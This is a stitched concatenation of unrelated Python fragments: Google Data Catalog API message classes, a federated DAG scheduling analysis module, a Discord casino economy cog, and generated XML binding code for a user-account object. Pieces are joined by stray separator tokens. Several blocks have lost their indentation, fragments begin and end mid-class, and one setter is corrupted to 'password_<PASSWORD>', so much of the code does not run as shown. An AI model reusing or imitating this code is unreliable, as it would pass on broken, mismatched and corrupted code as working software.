getIamPolicyRequest = _messages.MessageField('GetIamPolicyRequest', 1)
resource = _messages.StringField(2, required=True)
class DatacatalogProjectsLocationsEntryGroupsGetRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsGetRequest object.
Fields:
name: Required. The name of the entry group. For example,
`projects/{project_id}/locations/{location}/entryGroups/{entry_group_id}
`.
readMask: The fields to return. If not set or empty, all fields are
returned.
"""
name = _messages.StringField(1, required=True)
readMask = _messages.StringField(2)
class DatacatalogProjectsLocationsEntryGroupsSetIamPolicyRequest(_messages.Message):
  r"""A DatacatalogProjectsLocationsEntryGroupsSetIamPolicyRequest object.
  Fields:
    resource: REQUIRED: The resource for which the policy is being specified.
      See the operation documentation for the appropriate value for this
      field.
    setIamPolicyRequest: A SetIamPolicyRequest resource to be passed as the
      request body.
  """
  # Generated request message; field numbers are part of the wire format.
  resource = _messages.StringField(1, required=True)
  setIamPolicyRequest = _messages.MessageField('SetIamPolicyRequest', 2)
class DatacatalogProjectsLocationsEntryGroupsTestIamPermissionsRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsTestIamPermissionsRequest
object.
Fields:
resource: REQUIRED: The resource | |
<gh_stars>0
import numpy as np
import math
import copy
from collections import deque
import time
import collections
from ortools.sat.python import cp_model
from algorithms import heavy_cp
# Longest path of a DAG task (Floyd-Warshall-style dynamic program).
def longest_path_dag(adjacency) -> float:
    """Return the longest path length of the DAG encoded in ``adjacency``.

    The diagonal holds per-node WCETs; off-diagonal entries mark edges
    (lower triangle). Path lengths include both endpoint WCETs, with the
    shared intermediate node's WCET subtracted once per relaxation.
    """
    n = adjacency.shape[0]
    wcet = adjacency.diagonal()
    dist = np.zeros(adjacency.shape)
    for k in range(n):
        for row in range(n):
            if k == 0:
                # Seed: two-node paths row -> col where an edge exists.
                dist[row, :] = (wcet[row] + wcet[:]) * adjacency[row, :]
                # Upper triangle (including diagonal) is not a valid path.
                dist[np.triu_indices(n)] = -np.inf
            else:
                # Relax through intermediate node k (its WCET counted once).
                dist[row, :] = np.maximum(dist[row, :], dist[row, k] + dist[k, :] - adjacency[k, k])
    # A single node with no edges is itself the longest path.
    return max(wcet.max(), dist.max())
# HGSH bound for one heavy task on pro_a type-A and pro_b type-B processors.
def hgsh(task, processor):
    """Return the HGSH response-time bound of ``task`` on the given cores.

    ``processor`` is ``[num_A, num_B]``; the caller compares the returned
    response time against the task's period/deadline for feasibility.
    """
    original = copy.deepcopy(task)
    scaled = copy.deepcopy(task)
    # [number of type-A processors, number of type-B processors]
    cores = copy.deepcopy(processor)
    period = original[-1][-1]
    # Inter-processor workload term, skipping a type with zero cores.
    if cores[0] == 0:
        vol_sum = (original[1][-2] / cores[1]) * period
    elif cores[1] == 0:
        vol_sum = (original[1][-3] / cores[0]) * period
    else:
        vol_sum = (original[1][-3] / cores[0] + original[1][-2] / cores[1]) * period
    # Strip the bookkeeping cells before taking the longest path.
    scaled[0][0] = 0
    scaled[-1][-1] = 0
    # Scale each node's WCET by (1 - 1/m) for its processor type.
    for node in range(1, int(original[0][0] - 1)):
        scaled[node][node] = scaled[node][node] * (1 - (1 / (cores[int(original[0][node]) - 1])))
    return vol_sum + longest_path_dag(scaled)
def emu_assign(task_org, available_a, available_b, penalty_a, penalty_b):
    """Enumerate processor assignments for a heavy task, minimizing penalty.

    Tries every (a, b) from the utilization-implied minimum up to the
    available counts and keeps the cheapest feasible pair (HGSH response
    time within the period/deadline).

    Returns ``[a, b]`` on success, ``False`` if no feasible pair exists.
    """
    task = copy.deepcopy(task_org)
    # Minimum per-type core counts implied by the task's utilizations.
    min_a = math.ceil(task[1][-3])
    min_b = math.ceil(task[1][-2])
    # BUG FIX: the original tested `<`, i.e. it returned False precisely when
    # there WAS spare capacity; infeasibility is the opposite case. The search
    # ranges below (min..available) confirm `available_*` means capacity.
    if min_a > available_a or min_b > available_b:
        return False
    ub_a = int(available_a + 1)
    ub_b = int(available_b + 1)
    current_best = [0, 0]
    # Upper bound on the combined penalty (penalties are capacity fractions).
    penalty = 3
    for i in range(min_a, ub_a):
        for j in range(min_b, ub_b):
            penalty_temp = i * penalty_a + j * penalty_b
            if (hgsh(task, [i, j]) <= task[-1][-1]) and (penalty_temp < penalty):
                penalty = penalty_temp
                current_best[0] = i
                current_best[1] = j
                # Larger j only increases the penalty for this i.
                break
    if current_best[0] != 0 and current_best[1] != 0:
        return current_best
    else:
        return False
def greedy_assign(task_org, available_a, available_b, penalty_a, penalty_b):
    """Greedily grow a heavy task's processor assignment until feasible.

    Starting from the utilization-implied minima, repeatedly adds the core
    type whose marginal response-time gain (minus its penalty) is larger.

    Returns ``[a, b]`` on success, ``False`` when infeasible.
    """
    task = copy.deepcopy(task_org)
    current_a = math.ceil(task[1][-3])
    current_b = math.ceil(task[1][-2])
    # BUG FIX: the original tested `<`, rejecting exactly the cases with spare
    # capacity; the while-loop bounds (current <= available) confirm that
    # `available_*` is the capacity, so the infeasible direction is `>`.
    if current_a > available_a or current_b > available_b:
        return False
    response_time = hgsh(task, [current_a, current_b])
    while response_time > task[-1][-1] and current_a <= available_a and current_b <= available_b:
        temp_rt_a = hgsh(task, [(current_a + 1), current_b])
        temp_rt_b = hgsh(task, [current_a, (current_b + 1)])
        # Add the core type with the larger penalty-adjusted improvement.
        if (response_time - temp_rt_a - penalty_a) > (response_time - temp_rt_b - penalty_b):
            response_time = temp_rt_a
            current_a = current_a + 1
        else:
            response_time = temp_rt_b
            current_b = current_b + 1
    # NOTE(review): the loop may overshoot to available+1 cores; the caller
    # (sched_han) catches that by checking its remaining budget.
    # BUG FIX: was `<`; `<=` matches the feasibility convention used by
    # hgsh/emu_assign (response time equal to the deadline is schedulable).
    if response_time <= task[-1][-1]:
        return [current_a, current_b]
    else:
        return False
# Ceiling of the per-type utilization: lower bound on cores of type A and B.
def lb_processor(task):
    """Return ``[ceil(util_A), ceil(util_B)]`` for a DAG task.

    Row 0 of ``task`` stores the node count and each node's processor type
    (1 = A, 2 = B); each node row stores its utilization in the last
    meaningful column.
    """
    totals = [0, 0]
    last_col = int(task[0][0] - 1)
    for node in range(1, last_col):
        proc_type = int(task[0][node]) - 1
        totals[proc_type] += task[node][last_col]
    return [int(math.ceil(totals[0])), int(math.ceil(totals[1]))]
# Volume of a DAG task: total, type-A-only and type-B-only WCET sums.
def vol_dag(task):
    """Return ``[total_volume, volume_on_A, volume_on_B]``.

    Each stored utilization is multiplied by the task period (last cell).
    """
    period = task[-1][-1]
    return [task[0][-1] * period, task[1][-3] * period, task[1][-2] * period]
# schedule light tasks on processor A and B
def sched_light(light_tsks, processor_a, processor_b):
    """Fixed-point response-time analysis for the light tasks.

    ``light_tsks`` is assumed ordered by priority (index 0 = highest —
    TODO confirm against the caller). Returns 1 when every light task's
    iteration converges within its period/deadline, else 0.
    """
    light_tasks = copy.deepcopy(light_tsks)
    # Tasks already admitted; they interfere with every later (lower) priority.
    h_priority = []
    for i in range(0, len(light_tasks)):
        if len(h_priority) > 0:
            # initial response time equals to the volume of the DAG task
            x_k = vol_dag(light_tasks[i])[0]
            R_pre = vol_dag(light_tasks[i])[0]
            R_k = 0
            # Iterate R = volume + interference until fixed point or overrun.
            while (R_k != R_pre) and (R_k <= light_tasks[i][-1][-1]):
                w_a = 0
                w_b = 0
                for j in range(0, len(h_priority)):
                    # Carry-in workload of each higher-priority task in window R_pre.
                    w_a = w_a + (vol_dag(h_priority[j])[1] * math.ceil(R_pre / h_priority[j][-1][-1]))
                    w_b = w_b + (vol_dag(h_priority[j])[2] * math.ceil(R_pre / h_priority[j][-1][-1]))
                R_k = x_k + math.ceil(w_a / processor_a + w_b / processor_b)
                if R_k == R_pre:
                    # Converged: schedulable; it now interferes with later tasks.
                    h_priority.append(light_tasks[i])
                    break
                else:
                    R_pre = R_k
            if R_k > light_tasks[i][-1][-1]:
                # Response time exceeded the period/deadline: unschedulable set.
                return 0
        else:
            # the task with highest priority
            h_priority.append(light_tasks[i])
    # if all light tasks can be scheduled
    return 1
# Suspension time seen on processor A (work shipped to the B side).
def suspension_a(task, processor_b):
    """Return the type-B suspension bound: critical-path share plus the
    remaining B volume spread over ``processor_b`` cores."""
    b_volume = task[1][-2] * task[-1][-1]
    b_critical = task[2][-2]
    return b_critical + (b_volume - b_critical) / processor_b
# Suspension time seen on processor B (work shipped to the A side).
def suspension_b(task, processor_a):
    """Return the type-A suspension bound: critical-path share plus the
    remaining A volume spread over ``processor_a`` cores."""
    a_volume = task[1][-3] * task[-1][-1]
    a_critical = task[2][-3]
    return a_critical + (a_volume - a_critical) / processor_a
# Interference ceiling sum over higher-priority heavy-A tasks.
# tasks_hp = [[task, R_i], ...]
def sum_hp_a(time_t, tasks_hp):
    """Return the summed type-B workload of higher-priority tasks over a
    window of length ``time_t`` (each entry pairs a task with its response
    time ``R_i``)."""
    total = 0
    for hp_task, resp in tasks_hp:
        period = hp_task[-1][-1]
        util_b = hp_task[1][-2]
        total += math.ceil((time_t + resp) / period - util_b) * util_b * period
    return total
# the sum of ceiling for task with higher priorities: heavy_b
# task_hp = [[task, R_i]...]
def sum_hp_b(time_t, tasks_hp):
sum = 0
for i in range(len(tasks_hp)):
sum = sum + math.ceil((((time_t + tasks_hp[i][1]) / tasks_hp[i][0][-1][-1]) - tasks_hp[i][0][1][-3])) * tasks_hp[i][0][1][-3] * tasks_hp[i][0][-1][-1]
return sum
# Schedulability of a heavy-A task sharing one B core.
def sched_heavy_a(task_new, tasks_hp, processor_a):
    """Fixed-point response time of ``task_new`` given higher-priority tasks
    ``tasks_hp`` (pairs of task and response time).

    Returns the response time on convergence, ``False`` when infeasible,
    when no A core exists, or when the 20-minute wall-clock budget runs out.
    """
    if processor_a <= 0:
        return False
    base = task_new[1][-2] * task_new[-1][-1] + suspension_b(task_new, processor_a)
    # No interference: the constant term is the answer.
    if len(tasks_hp) == 0:
        return base
    deadline = task_new[-1][-1]
    t = 10 ** (-5)
    started = time.time()
    while t <= deadline and time.time() - started < 1200:
        rt = base + sum_hp_a(t, tasks_hp)
        if rt <= t:
            # Fixed point reached.
            return rt
        t = rt
    return False
# Schedulability of a heavy-B task sharing one A core.
def sched_heavy_b(task_new, tasks_hp, processor_b):
    """Fixed-point response time of ``task_new`` given higher-priority tasks
    ``tasks_hp`` (pairs of task and response time).

    Returns the response time on convergence, ``False`` when infeasible,
    when no B core exists, or when the 20-minute wall-clock budget runs out.
    """
    if processor_b <= 0:
        return False
    base = task_new[1][-3] * task_new[-1][-1] + suspension_a(task_new, processor_b)
    # No interference: the constant term is the answer.
    if len(tasks_hp) == 0:
        return base
    deadline = task_new[-1][-1]
    t = 10 ** (-5)
    started = time.time()
    while t <= deadline and time.time() - started < 1200:
        rt = base + sum_hp_b(t, tasks_hp)
        if rt <= t:
            # Fixed point reached.
            return rt
        t = rt
    return False
# Schedule a light task on one A core plus one B core.
def sched_light_fix(light_task, task_hp_a, task_hp_b):
    """Fixed-point response time of ``light_task`` under interference from
    the higher-priority task lists on each core.

    Returns the response time on convergence, otherwise ``False``.
    NOTE(review): sum_hp_a is applied to task_hp_b and vice versa — looks
    deliberate (cross-type workload), but confirm against the paper.
    """
    wcet = light_task[0][-1] * light_task[-1][-1]
    # Both cores empty: the WCET is the response time.
    if len(task_hp_a) == 0 and len(task_hp_b) == 0:
        return wcet
    deadline = light_task[-1][-1]
    t = 10 ** (-5)
    started = time.time()
    while t <= deadline and time.time() - started < 1200:
        rt = wcet + sum_hp_a(t, task_hp_b) + sum_hp_b(t, task_hp_a)
        if rt <= t:
            return rt
        t = rt
    return False
# Number of A processors needed when a task uses only type A.
def only_processor_a(task_org, available_a):
    """Return the smallest type-A core count that makes ``task_org``
    feasible under HGSH, or 0 when none within ``available_a`` works.

    Cleanup: the original deep-copied both arguments, but ``hgsh`` already
    deep-copies its task and an int deepcopy is a no-op, so the copies were
    pure overhead; behavior is unchanged.
    """
    for count in range(1, int(available_a) + 1):
        if hgsh(task_org, [count, 0]) <= task_org[-1][-1]:
            return int(count)
    return 0
# Number of B processors needed when a task uses only type B.
def only_processor_b(task_org, available_b):
    """Return the smallest type-B core count that makes ``task_org``
    feasible under HGSH, or 0 when none within ``available_b`` works.

    Cleanup: redundant deepcopies removed (``hgsh`` deep-copies its task and
    an int deepcopy is a no-op); behavior is unchanged.
    """
    for count in range(1, int(available_b) + 1):
        if hgsh(task_org, [0, count]) <= task_org[-1][-1]:
            return int(count)
    return 0
# federated scheduling according to Meiling Han's paper
# with different processor assignment method
# mod 0: emu assignment
# mod 1: greedy method
def sched_han(taskst, available_a, available_b, mod):
taskset = copy.deepcopy(taskst)
current_available_a = copy.deepcopy(available_a)
current_available_b = copy.deepcopy(available_b)
penalty_a = 1 / current_available_a
penalty_b = 1 / current_available_b
light_tasks = []
for i in range(0, len(taskset)):
# check if the task only require one type of processor
# only require processor A:
# ("utilization A:", )
if taskset[i][1][-2] == 0:
# print("partitioned", taskset[i][0])
used_a = only_processor_a(taskset[i], current_available_a)
if used_a > 0:
current_available_a = current_available_a - used_a
else:
return 0
# only require processor B:
if taskset[i][1][-3] == 0:
used_b = only_processor_b(taskset[i], current_available_b)
if used_b > 0:
current_available_b = current_available_b - used_b
else:
return 0
# try to divide the tasks into heavy and light
# heavy task: density > 1 -> volume > period
if taskset[i][0][-1] > 1:
# different processor assignment methods
if mod == 1:
assigned = emu_assign(taskset[i], current_available_a, current_available_b, penalty_a, penalty_b)
else:
assigned = greedy_assign(taskset[i], current_available_a, current_available_b, penalty_a, penalty_b)
# update the current available processors
if assigned:
current_available_a = current_available_a - assigned[0]
current_available_b = current_available_b - assigned[1]
else:
return 0
# no sufficient processors for heavy tasks
if current_available_a < 0 or current_available_b < 0:
return 0
# store all light tasks here
else:
light_tasks.append(taskset[i])
# HERE: Do we need to consider how to allocate light tasks on the available processors?
# for example, try to share as much as possible like the improved version.
# if there is only one light task, check | |
# Developed by Redjumpman for Redbot.
# Inspired by Spriter's work on a modded economy.
# Creates 1 json file, 1 log file per 10mb, and requires tabulate.
# STD Library
import asyncio
import gettext
import logging
import logging.handlers
import os
import random
from copy import deepcopy
from fractions import Fraction
from operator import itemgetter
from datetime import datetime, timedelta
# Discord imports
import discord
from .utils import checks
from .utils.dataIO import dataIO
from discord.ext import commands
from __main__ import send_cmd_help
# Third Party Libraries
from tabulate import tabulate
from dateutil import parser
try:
    # Load the configured language and install gettext's `_` into builtins.
    l_path = "data/JumperCogs/casino/data/languages.json"
    lang_data = dataIO.load_json(l_path)
    lang_default = lang_data["Language"]
    language_set = gettext.translation('casino', localedir='data/JumperCogs/casino/data',
                                       languages=[lang_default])
    language_set.install()
except FileNotFoundError:
    # No language data yet: fall back to an identity translator.
    # NOTE(review): a missing "Language" key (KeyError) is not handled — confirm.
    _ = lambda s: s
# Default settings that is created when a server begin's using Casino
server_default = {"System Config": {"Casino Name": "Redjumpman", "Casino Open": True,
                                    "Chip Name": "Jump", "Chip Rate": 1, "Default Payday": 100,
                                    "Payday Timer": 1200, "Threshold Switch": False,
                                    "Threshold": 10000, "Credit Rate": 1, "Transfer Limit": 1000,
                                    "Transfer Cooldown": 30, "Version": 1.715
                                    },
                  "Memberships": {},
                  "Players": {},
                  "Games": {"Dice": {"Multiplier": 2.2, "Cooldown": 5, "Open": True, "Min": 50,
                                     "Max": 500, "Access Level": 0},
                            "Coin": {"Multiplier": 1.5, "Cooldown": 5, "Open": True, "Min": 10,
                                     "Max": 10, "Access Level": 0},
                            "Cups": {"Multiplier": 2.2, "Cooldown": 5, "Open": True, "Min": 50,
                                     "Max": 500, "Access Level": 0},
                            "Blackjack": {"Multiplier": 2.2, "Cooldown": 5, "Open": True,
                                          "Min": 50, "Max": 500, "Access Level": 0},
                            "Allin": {"Multiplier": 2.2, "Cooldown": 43200, "Open": True,
                                      "Access Level": 0},
                            "Hi-Lo": {"Multiplier": 1.5, "Cooldown": 5, "Open": True,
                                      "Min": 20, "Max": 20, "Access Level": 0},
                            "War": {"Multiplier": 1.5, "Cooldown": 5, "Open": True,
                                    "Min": 20, "Max": 20, "Access Level": 0},
                            }
                  }
# Template for a freshly registered player record.
# NOTE: always deepcopy these templates before storing them (shared dicts
# would otherwise leak state between players/servers).
new_user = {"Chips": 100,
            "Membership": None,
            "Pending": 0,
            "Played": {"Dice Played": 0, "Cups Played": 0, "BJ Played": 0, "Coin Played": 0,
                       "Allin Played": 0, "Hi-Lo Played": 0, "War Played": 0},
            "Won": {"Dice Won": 0, "Cups Won": 0, "BJ Won": 0, "Coin Won": 0, "Allin Won": 0,
                    "Hi-Lo Won": 0, "War Won": 0},
            "Cooldowns": {"Dice": 0, "Cups": 0, "Coin": 0, "Allin": 0, "Hi-Lo": 0, "War": 0,
                          "Blackjack": 0, "Payday": 0, "Transfer": 0}
            }
# Deck used for blackjack, and a dictionary to correspond values of the cards.
main_deck = ['2', '3', '4', '5', '6', '7', '8', '9', '10', 'Jack', 'Queen', 'King', 'Ace'] * 4
# Ace is intentionally absent from bj_values: it is scored 1 or 11 at runtime.
bj_values = {'2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9, '10': 10, 'Jack': 10,
             'Queen': 10, 'King': 10}
war_values = {'2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9, '10': 10, 'Jack': 11,
              'Queen': 12, 'King': 13, 'Ace': 14}
# Canonical list of casino game names (used for settings lookups).
c_games = ["Blackjack", "Coin", "Allin", "Cups", "Dice", "Hi-Lo", "War"]
class CasinoError(Exception):
    """Base class for every casino-specific error."""
    pass
class UserAlreadyRegistered(CasinoError):
    """Raised when creating an account for a user that already has one."""
    pass
class UserNotRegistered(CasinoError):
    """Raised when an operation targets a user with no casino account."""
    pass
class InsufficientChips(CasinoError):
    """Raised when a bet, withdrawal, or transfer exceeds the chip balance."""
    pass
class NegativeChips(CasinoError):
    """Raised when a chip amount is negative."""
    pass
class SameSenderAndReceiver(CasinoError):
    """Raised when a transfer's sender and receiver are the same user."""
    pass
class BotNotAUser(CasinoError):
    """Raised when the bot itself is named as a transfer receiver."""
    pass
class CasinoBank:
"""Holds all of the Casino hooks for integration"""
    def __init__(self, bot, file_path):
        # Full membership tree, loaded once from JSON and mutated in place.
        self.memberships = dataIO.load_json(file_path)
        self.bot = bot
        # Current data-format version; check_server_settings migrates old data.
        self.patch = 1.715
def create_account(self, user):
server = user.server
path = self.check_server_settings(server)
if user.id not in path["Players"]:
default_user = deepcopy(new_user)
path["Players"][user.id] = default_user
path["Players"][user.id]["Name"] = user.name
self.save_system()
membership = path["Players"][user.id]
return membership
else:
raise UserAlreadyRegistered()
def membership_exists(self, user):
try:
self.get_membership(user)
except UserNotRegistered:
return False
return True
def chip_balance(self, user):
account = self.get_membership(user)
return account["Chips"]
def can_bet(self, user, amount):
account = self.get_membership(user)
if account["Chips"] >= amount:
return True
else:
raise InsufficientChips()
def set_chips(self, user, amount):
if amount < 0:
raise NegativeChips()
account = self.get_membership(user)
account["Chips"] = amount
self.save_system()
def deposit_chips(self, user, amount):
amount = int(round(amount))
if amount < 0:
raise NegativeChips()
account = self.get_membership(user)
account["Chips"] += amount
self.save_system()
def withdraw_chips(self, user, amount):
if amount < 0:
raise NegativeChips()
account = self.get_membership(user)
if account["Chips"] >= amount:
account["Chips"] -= amount
self.save_system()
else:
raise InsufficientChips()
def transfer_chips(self, sender, receiver, amount):
if amount < 0:
raise NegativeChips()
if sender is receiver:
raise SameSenderAndReceiver()
if receiver == self.bot.user:
raise BotNotAUser()
if self.membership_exists(sender) and self.membership_exists(receiver):
sender_acc = self.get_membership(sender)
if sender_acc["Chips"] < amount:
raise InsufficientChips()
self.withdraw_chips(sender, amount)
self.deposit_chips(receiver, amount)
else:
raise UserNotRegistered()
def wipe_caisno_server(self, server):
self.memberships["Servers"].pop(server.id)
self.save_system()
def wipe_casino_members(self, server):
self.memberships["Servers"][server.id]["Players"] = {}
self.save_system()
def remove_membership(self, user):
server = user.server
self.memberships["Servers"][server.id]["Players"].pop(user.id)
self.save_system()
def get_membership(self, user):
server = user.server
path = self.check_server_settings(server)
try:
return path["Players"][user.id]
except KeyError:
raise UserNotRegistered()
    def get_all_servers(self):
        # Live mapping of server.id -> that server's casino data.
        return self.memberships["Servers"]
    def get_casino_server(self, server):
        # Raises KeyError for servers that have never used the casino.
        return self.memberships["Servers"][server.id]
def get_server_memberships(self, server):
if server.id in self.memberships["Servers"]:
members = self.memberships["Servers"][server.id]["Players"]
return members
else:
return []
    def save_system(self):
        # Persist the whole membership tree; called after every mutation.
        dataIO.save_json("data/JumperCogs/casino/casino.json", self.memberships)
def check_server_settings(self, server):
if server.id not in self.memberships["Servers"]:
self.memberships["Servers"][server.id] = server_default
self.save_system()
print(_("Creating default casino settings for Server: {}").format(server.name))
path = self.memberships["Servers"][server.id]
return path
else:
path = self.memberships["Servers"][server.id]
try:
if path["System Config"]["Version"] < self.patch:
self.casino_patcher(path)
path["System Config"]["Version"] = self.patch
except KeyError:
path["System Config"]["Version"] = self.patch
self.casino_patcher(path)
return path
def casino_patcher(self, path):
if path["System Config"]["Version"] < 1.706:
self.patch_1581(path)
self.patch_1692(path)
self.patch_1694(path)
self.patch_16(path)
if path["System Config"]["Version"] < 1.712:
self.patch_1712(path)
if path["System Config"]["Version"] < 1.715:
self.patch_1715(path)
# Save changes and return updated dictionary.
self.save_system()
def name_fix(self):
servers = self.get_all_servers()
removal = []
for server in servers:
try:
server_obj = self.bot.get_server(server)
self.name_bug_fix(server_obj)
except AttributeError:
removal.append(server)
logger.info("WIPED SERVER: {} FROM CASINO".format(server))
print(_("Removed server ID: {} from the list of servers, because the bot is no "
"longer on that server.").format(server))
for x in removal:
self.memberships["Servers"].pop(x)
self.save_system()
def name_bug_fix(self, server):
players = self.get_server_memberships(server)
for player in players:
mobj = server.get_member(player)
try:
# noinspection PyTypeChecker
if mobj.name != players[player]["Name"]:
players[player]["Name"] = mobj.name
except AttributeError:
print(_("Error updating name! {} is no longer on this server.").format(player))
def patch_games(self, path):
# Check if player data has the war game, and if not add it.
for player in path["Players"]:
if "War Played" not in path["Players"][player]["Played"]:
path["Players"][player]["Played"]["War Played"] = 0
if "War Won" not in path["Players"][player]["Won"]:
path["Players"][player]["Won"]["War Won"] = 0
if "War" not in path["Players"][player]["Cooldowns"]:
path["Players"][player]["Cooldowns"]["War"] = 0
self.save_system()
def patch_1715(self, path):
"""Fix transfer issues"""
for player in path["Players"]:
path["Players"][player]["Cooldowns"] = {}
path["Players"][player]["Cooldowns"]["Allin"] = 0
path["Players"][player]["Cooldowns"]["Blackjack"] = 0
path["Players"][player]["Cooldowns"]["Coin"] = 0
path["Players"][player]["Cooldowns"]["Cups"] = 0
path["Players"][player]["Cooldowns"]["Dice"] = 0
path["Players"][player]["Cooldowns"]["Hi-Lo"] = 0
path["Players"][player]["Cooldowns"]["Payday"] = 0
path["Players"][player]["Cooldowns"]["Transfer"] = 0
path["Players"][player]["Cooldowns"]["War"] = 0
self.save_system()
def patch_1712(self, path):
"""Fixes older players in the casino who didn't have war or hi-lo"""
hilo_data = {"Played": {"Hi-Lo Played": 0}, "Won": {"Hi-Lo Won": 0},
"Cooldown": {"Hi-Lo": 0}}
war_data = {"Played": {"War Played": 0}, "Won": {"War Won": 0}, "Cooldown": {"War": 0}}
for player in path["Players"]:
if "Hi-Lo Played" not in path["Players"][player]["Played"]:
self.player_update(path["Players"][player], hilo_data)
if "War Played" not in path["Players"][player]["Played"]:
self.player_update(path["Players"][player], war_data)
self.save_system()
    def player_update(self, player_data, new_game, path=None):
        """Helper function to add new data into the player's data"""
        # Recursive dict merge: keys missing from `player_data` are copied in;
        # identical leaves are skipped; a differing leaf raises (no overwrite).
        # `path` accumulates the key trail purely for the error message.
        if path is None:
            path = []
        for key in new_game:
            if key in player_data:
                if isinstance(player_data[key], dict) and isinstance(new_game[key], dict):
                    self.player_update(player_data[key], new_game[key], path + [str(key)])
                elif player_data[key] == new_game[key]:
                    pass
                else:
                    raise Exception(_("Conflict at {}").format("".join(path + [str(key)])))
            else:
                player_data[key] = new_game[key]
        # NOTE(review): saves once per recursion level — redundant but harmless.
        self.save_system()
def patch_1694(self, path):
"""This patch aimed at converting the old cooldown times into unix time."""
print(_("patch_1694 ran"))
for player in path["Players"]:
try:
for cooldown in path["Players"][player]["Cooldowns"]:
s = path["Players"][player]["Cooldowns"][cooldown]
convert = datetime.utcnow() - timedelta(seconds=s)
path["Players"][player]["Cooldowns"][cooldown] = convert.isoformat()
except TypeError:
pass
self.save_system()
    def patch_1692(self, path):
        """Issues with memberships storing keys that are lower case.
        Fire bombing everyones memberships so I don't have nightmares.
        """
        # Drops every membership tier definition; player records are untouched.
        path["Memberships"] = {}
        self.save_system()
def patch_16(self, path):
if "Transfer Limit" not in path["System Config"]:
transfer_dict = {"Transfer Limit": 1000, "Transfer Cooldown": 30}
path["System Config"].update(transfer_dict)
for x in path["Players"]:
if "Transfer" not in path["Players"][x]["Cooldowns"]:
path["Players"][x]["Cooldowns"]["Transfer"] = 0
self.save_system()
def patch_1581(self, path):
# Fixes the name bug for older versions
self.name_fix()
# Add hi-lo to older versions
if "Hi-Lo" not in path["Games"]:
hl = {"Hi-Lo": {"Multiplier": 1.5, "Cooldown": 0, "Open": True, "Min": 20,
"Max": 20}}
path["Games"].update(hl)
# Add war to older versions
if "War" not in path["Games"]:
war = {"War": {"Multiplier": 1.5, "Cooldown": 0, "Open": True, "Min": 50,
"Max": 100}}
path["Games"].update(war)
# Add membership changes from patch 1.5 to older versions
trash = ["Membership Lvl 0", "Membership Lvl 1", "Membership Lvl 2",
"Membership Lvl 3"]
new = {"Threshold Switch": False, "Threshold": 10000, "Default Payday": 100,
"Payday Timer": 1200}
for k, v in new.items():
if k not in path["System Config"]:
path["System Config"][k] = v
if "Memberships" not in path:
path["Memberships"] = {}
# Game access levels added
for x in | |
self.Last_Login
def set_Last_Login(self, Last_Login): self.Last_Login = Last_Login
def get_Privilege_List(self): return self.Privilege_List
def set_Privilege_List(self, Privilege_List): self.Privilege_List = Privilege_List
def get_Script_Path(self): return self.Script_Path
def set_Script_Path(self, Script_Path): self.Script_Path = Script_Path
def get_Username(self): return self.Username
def set_Username(self, Username): self.Username = Username
def get_User_Password_Age(self): return self.User_Password_Age
def set_User_Password_Age(self, User_Password_Age): self.User_Password_Age = User_Password_Age
def get_password_required(self): return self.password_required
def set_password_required(self, password_required): self.password_required = password_<PASSWORD>
    def export(self, outfile, level, namespace_='UserAccountObj:', name_='UserAccountObjectType', namespacedef_=''):
        # Serializes this object as an XML element to `outfile` at `level` indent.
        showIndent(outfile, level)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = []
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='UserAccountObjectType')
        if self.hasContent_():
            outfile.write('>\n')
            # Children always use the fixed 'UserAccountObj:' prefix, regardless
            # of the namespace_ this element was called with.
            self.exportChildren(outfile, level + 1, 'UserAccountObj:', name_)
            showIndent(outfile, level)
            outfile.write('</%s%s>\n' % (namespace_, name_))
        else:
            # No children: emit a self-closing tag.
            outfile.write('/>\n')
    def exportAttributes(self, outfile, level, already_processed, namespace_='UserAccountObj:', name_='UserAccountObjectType'):
        # Parent attributes first, then this type's password_required flag
        # (rendered as a lowercase XML boolean).
        super(UserAccountObjectType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='UserAccountObjectType')
        if self.password_required is not None and 'password_required' not in already_processed:
            already_processed.append('password_required')
            outfile.write(' password_required="%s"' % self.gds_format_boolean(self.gds_str_lower(str(self.password_required)), input_name='password_required'))
    def exportChildren(self, outfile, level, namespace_='UserAccountObj:', name_='UserAccountObjectType', fromsubclass_=False):
        # Writes each non-None child element in schema order, then lets the
        # superclass append its own children.
        if self.User_ID is not None:
            self.User_ID.export(outfile, level, namespace_, name_='User_ID')
        if self.Full_Name is not None:
            self.Full_Name.export(outfile, level, namespace_, name_='Full_Name')
        if self.Group_List is not None:
            self.Group_List.export(outfile, level, namespace_, name_='Group_List')
        if self.Home_Directory is not None:
            self.Home_Directory.export(outfile, level, namespace_, name_='Home_Directory')
        if self.Last_Login is not None:
            self.Last_Login.export(outfile, level, namespace_, name_='Last_Login')
        if self.Privilege_List is not None:
            self.Privilege_List.export(outfile, level, namespace_, name_='Privilege_List')
        if self.Script_Path is not None:
            self.Script_Path.export(outfile, level, namespace_, name_='Script_Path')
        if self.Username is not None:
            self.Username.export(outfile, level, namespace_, name_='Username')
        if self.User_Password_Age is not None:
            self.User_Password_Age.export(outfile, level, namespace_, name_='User_Password_Age')
        super(UserAccountObjectType, self).exportChildren(outfile, level, namespace_, name_, True)
def hasContent_(self):
if (
self.User_ID is not None or
self.Full_Name is not None or
self.Group_List is not None or
self.Home_Directory is not None or
self.Last_Login is not None or
self.Privilege_List is not None or
self.Script_Path is not None or
self.Username is not None or
self.User_Password_Age is not None
):
return True
else:
return False
    def exportLiteral(self, outfile, level, name_='UserAccountObjectType'):
        # Renders the object as Python constructor source (generateDS debug aid).
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        # Emits the password_required attribute as a keyword-argument line.
        if self.password_required is not None and 'password_required' not in already_processed:
            already_processed.append('password_required')
            showIndent(outfile, level)
            outfile.write('password_required = %s,\n' % (self.password_required,))
    def exportLiteralChildren(self, outfile, level, name_):
        # Emits each set child as Python literal source; simple children are
        # quoted strings, list-like children recurse via exportLiteral.
        if self.User_ID is not None:
            showIndent(outfile, level)
